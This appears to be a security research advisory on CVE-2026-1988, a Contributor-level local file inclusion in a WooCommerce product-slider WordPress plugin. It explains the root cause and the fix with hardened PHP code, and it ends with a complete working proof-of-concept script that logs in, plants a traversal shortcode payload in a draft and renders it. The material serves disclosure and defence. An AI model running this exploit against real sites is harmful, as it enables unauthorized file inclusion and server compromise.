Atomic Edge analysis of CVE-2026-1988 (metadata-based):
This vulnerability is an authenticated local file inclusion (LFI) in the Flexi Product Slider and Grid for WooCommerce WordPress plugin, affecting versions up to and including 1.0.5. The flaw resides in the `flexipsg_carousel` shortcode handler. A user with Contributor-level permissions or higher can place a directory traversal sequence in the shortcode's `theme` attribute and make the server include an arbitrary local file; if that file contains PHP it is executed, so the bug can escalate to remote code execution. The CVSS score of 7.5 reflects a high-impact attack that requires authentication but has low attack complexity.
Atomic Edge research infers the root cause from the CWE-98 classification (improper control of the filename passed to a PHP include/require statement) and from the vulnerability description. The shortcode handler most likely concatenates the `theme` attribute into a file path and passes the result to `include()` or `require()` without sanitizing it; the description confirms the attribute is concatenated into a path. Because nothing strips directory components or rejects `..`, a sequence such as `../../../` escapes the intended theme directory, and because nothing compares the value against an allowlist of the themes the plugin ships, any file the web server can read becomes a candidate for inclusion.
Exploitation takes place through the WordPress post editor. The authenticated attacker creates or edits a post and embeds `[flexipsg_carousel theme="..."]` with a traversal payload in the `theme` attribute. The inclusion fires server-side whenever the post content is rendered through `the_content()`, which runs `do_shortcode()`: a Contributor cannot publish, but previewing their own draft renders it just the same, and the post renders for every visitor once an Editor approves it. A payload such as `theme=../../../wp-config.php` demonstrates the traversal, with the caveat that a PHP file reached through `include()` is executed rather than displayed, so it produces side effects (for example PHP warnings about constants being redefined) rather than a copy of its source. A payload such as `theme=../../../malicious.php` executes arbitrary PHP already present on the server, which is the code-execution path. The attack vector is the post editor, and the endpoint is the site's frontend where the shortcode renders.
Effective remediation requires strict input validation and path sanitization in the shortcode handler. The plugin should compare the `theme` attribute against a predefined list of the theme names it ships and refuse anything else. It should also reject, rather than merely strip, values that contain directory components: run the value through `basename()` (or `sanitize_file_name()`) and treat any difference from the original as tampering. As a final guard, it should resolve the assembled path with `realpath()` and confirm the result still lies inside the plugin's theme directory before passing it to `include()`. Capability checks on the handler add little here, since shortcodes are rendered for whoever views the post, and the description already indicates authentication is required to plant the shortcode; the fix belongs in how the path is built.
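The root-cause pattern inferred above and the remediation it calls for, as an added illustration that is not the plugin's code: a hypothetical `flexipsg_carousel` handler that concatenates the attribute straight into `include()`, followed by a hardened version that allowlists the theme name, refuses any directory component, and confirms the `realpath()` result stays inside the theme directory. The theme names, directory layout and include line are assumptions; the file runs stand-alone under the PHP CLI against a throwaway directory it creates and removes itself.

```php
<?php
// Added example, not the plugin's own source: a hypothetical `flexipsg_carousel`
// handler written the way the CWE-98 description implies, next to a hardened
// version. Theme names, directory layout and the exact include line are assumed.

// Minimal stand-in for WordPress's shortcode_atts() so the file runs outside WP.
if (!function_exists('shortcode_atts')) {
    function shortcode_atts(array $pairs, $atts): array
    {
        return array_merge($pairs, array_intersect_key((array) $atts, $pairs));
    }
}

// Vulnerable pattern (assumed): the attribute is concatenated into the include
// path unchanged, so theme="../../../wp-config.php" walks out of the theme directory.
function flexipsg_carousel_vulnerable($atts, string $themeDir): string
{
    $atts = shortcode_atts(['theme' => 'default'], $atts);
    ob_start();
    include $themeDir . '/' . $atts['theme'];   // CWE-98: attacker controls the path
    return (string) ob_get_clean();
}

// Hardened resolver: allowlist, no directory components, canonical path check.
// Returns the absolute path of the theme file, or null when the input is rejected.
function flexipsg_resolve_theme(string $theme, string $themeDir): ?string
{
    $allowed = ['default', 'grid', 'carousel-dark'];   // assumed shipped themes

    // Any directory component (../, /, \) means the value is not a plain name.
    if ($theme === '' || basename($theme) !== $theme) {
        return null;
    }
    if (!in_array($theme, $allowed, true)) {
        return null;
    }

    // realpath() resolves symlinks and '..'; the result must stay under $themeDir.
    $base = realpath($themeDir);
    $path = realpath($themeDir . '/' . $theme . '.php');
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

function flexipsg_carousel_hardened($atts, string $themeDir): string
{
    $atts = shortcode_atts(['theme' => 'default'], $atts);
    $path = flexipsg_resolve_theme((string) $atts['theme'], $themeDir);
    if ($path === null) {
        return '';   // unknown or tampered theme: render nothing, include nothing
    }
    ob_start();
    include $path;
    return (string) ob_get_clean();
}

// Stand-alone demonstration: a throwaway theme directory with one real theme and
// one constructed file just outside it, run through both handlers.
$dir = sys_get_temp_dir() . '/flexipsg-demo-' . getmypid();
mkdir($dir, 0700);
file_put_contents($dir . '/default.php', '<?php echo "[default theme rendered]";');
$outside = '../flexipsg-outside-' . getmypid() . '.txt';
file_put_contents($dir . '/' . $outside, 'OUTSIDE FILE');

$inputs = ['default', $outside, '../default', 'grid/../default', 'evil', '../../../wp-config.php'];
foreach ($inputs as $theme) {
    $resolved = flexipsg_resolve_theme($theme, $dir);
    printf("%-32s hardened: %s\n", $theme,
        $resolved === null ? 'rejected' : 'ok (' . basename($resolved) . ')');
}
// The vulnerable handler emits the file outside the theme directory verbatim.
echo "vulnerable, theme=$outside => ", flexipsg_carousel_vulnerable(['theme' => $outside], $dir), "\n";
echo "hardened,   theme=default => ", flexipsg_carousel_hardened(['theme' => 'default'], $dir), "\n";

unlink($dir . '/default.php');
unlink($dir . '/' . $outside);
rmdir($dir);
```

The resolver rejects `../default` even though `basename()` would map it to an allowed name: a value that is not a plain theme name is treated as tampering rather than silently repaired, which keeps the allowlist the single source of truth and makes a hit in the logs meaningful.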
Successful exploitation has severe consequences. Because the flaw is an include rather than a file read, the outcome depends on what is included: a non-PHP file (a log, a backup, a text export) is emitted into the page and disclosed, while a PHP file is executed with the web server's privileges. Including `wp-config.php` therefore re-runs it rather than printing the database credentials and authentication keys it holds, but an attacker who can place PHP code anywhere on the filesystem, through an unrelated upload flaw or by seeding a log file the server writes, turns the inclusion into remote code execution. That gives a Contributor-level user code execution as the web server, leading to full site compromise, data theft, and attacks on other systems launched from the server.
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-1988 - Flexi Product Slider and Grid for WooCommerce <= 1.0.5 - Authenticated (Contributor+) Local File Inclusion via 'theme' Shortcode Attribute
<?php
/*
Assumptions:
1. The target site has the vulnerable plugin (<=1.0.5) installed.
2. We have valid Contributor-level (or higher) credentials.
3. The plugin's shortcode is `flexipsg_carousel` with a `theme` parameter.
4. The vulnerability triggers when a post containing the shortcode is rendered,
   which includes the author's own draft preview (Contributors cannot publish).
5. The file inclusion happens server-side during shortcode rendering: an included
   PHP file is executed, not displayed; a non-PHP file is echoed into the page.
6. The site runs a WordPress version with the REST API and the
   admin-ajax.php?action=rest-nonce endpoint (5.0+), which this PoC uses to
   create the post instead of scraping the editor form for nonces.
This PoC demonstrates the attack flow:
1. Authenticate to WordPress and keep the session cookies.
2. Fetch a REST nonce and create a draft post containing the malicious shortcode.
3. Request the draft preview to trigger the file inclusion and inspect the response.
*/
$target_url = rtrim('https://example.com', '/');
$username = 'contributor_user';
$password = 'password123';
$file_to_include = '../../../wp-config.php'; // Target file; adjust the depth to the plugin's theme directory
$cookie_jar = tempnam(sys_get_temp_dir(), 'wp-cookie-');

// Small cURL wrapper: shares the cookie jar across requests and returns [status, body].
function http_request(string $url, string $cookie_jar, array $opts = []): array
{
    $ch = curl_init($url);
    curl_setopt_array($ch, $opts + [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => true,
        CURLOPT_COOKIEJAR => $cookie_jar,
        CURLOPT_COOKIEFILE => $cookie_jar,
        CURLOPT_USERAGENT => 'Mozilla/5.0 (Atomic Edge PoC)',
    ]);
    $body = curl_exec($ch);
    if ($body === false) {
        fwrite(STDERR, 'cURL error: ' . curl_error($ch) . "\n");
        exit(1);
    }
    $status = (int) curl_getinfo($ch, CURLINFO_RESPONSE_CODE);
    curl_close($ch);
    return [$status, $body];
}

// Step 1: Authenticate. The initial GET collects wordpress_test_cookie, which
// wp-login.php checks before it accepts a form login; the POST then stores the
// wordpress_logged_in_* cookie in the jar.
http_request($target_url . '/wp-login.php', $cookie_jar);
http_request($target_url . '/wp-login.php', $cookie_jar, [
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'log' => $username,
        'pwd' => $password,
        'wp-submit' => 'Log In',
        'redirect_to' => $target_url . '/wp-admin/',
        'testcookie' => '1',
    ]),
]);
if (strpos((string) file_get_contents($cookie_jar), 'wordpress_logged_in') === false) {
    fwrite(STDERR, "Login failed: no wordpress_logged_in cookie was issued.\n");
    exit(1);
}

// Step 2a: Obtain a REST nonce bound to the cookie session.
[$status, $nonce] = http_request($target_url . '/wp-admin/admin-ajax.php?action=rest-nonce', $cookie_jar);
$nonce = trim($nonce);
if ($status !== 200 || !preg_match('/^[0-9a-f]{10}$/', $nonce)) {
    fwrite(STDERR, "Could not obtain a REST nonce (HTTP $status).\n");
    exit(1);
}

// Step 2b: Create a draft containing the malicious shortcode. A Contributor may
// create drafts but not publish; a draft is enough because we preview it ourselves.
$post_title = 'Test Post with Malicious Shortcode';
$post_content = '[flexipsg_carousel theme="' . $file_to_include . '"]';
[$status, $body] = http_request($target_url . '/wp-json/wp/v2/posts', $cookie_jar, [
    CURLOPT_POST => true,
    CURLOPT_HTTPHEADER => ['Content-Type: application/json', 'X-WP-Nonce: ' . $nonce],
    CURLOPT_POSTFIELDS => json_encode([
        'title' => $post_title,
        'content' => $post_content,
        'status' => 'draft',
    ]),
]);
$post = json_decode($body, true);
if ($status !== 201 || !isset($post['id'])) {
    fwrite(STDERR, "Post creation failed (HTTP $status): $body\n");
    exit(1);
}
$post_id = (int) $post['id'];
echo "Created draft post ID $post_id\n";

// Step 3: Render the draft. Previewing our own draft runs the_content(), hence
// do_shortcode(), which is where the plugin performs the include.
$post_url = $target_url . '/?p=' . $post_id . '&preview=true';
[$status, $response] = http_request($post_url, $cookie_jar);

// Step 4: Inspect the response. A PHP target such as wp-config.php is executed,
// not printed: on a server that displays errors, re-defining DB_NAME and friends
// yields "Constant DB_NAME already defined" warnings, the observable side effect.
// A non-PHP target (a log or text file) is echoed into the page verbatim.
if (preg_match('/Constant [A-Z_]+ already defined/', $response)) {
    echo "Redefinition warnings in the response (HTTP $status): wp-config.php was included and executed.\n";
} elseif (strpos($response, 'DB_NAME') !== false || strpos($response, '<?php') !== false) {
    echo "File content appears in the response (HTTP $status): a non-PHP file was included and echoed.\n";
} else {
    echo "No inclusion evidence in the response (HTTP $status): wrong traversal depth, missing file, or a silent include.\n";
}
unlink($cookie_jar);
?>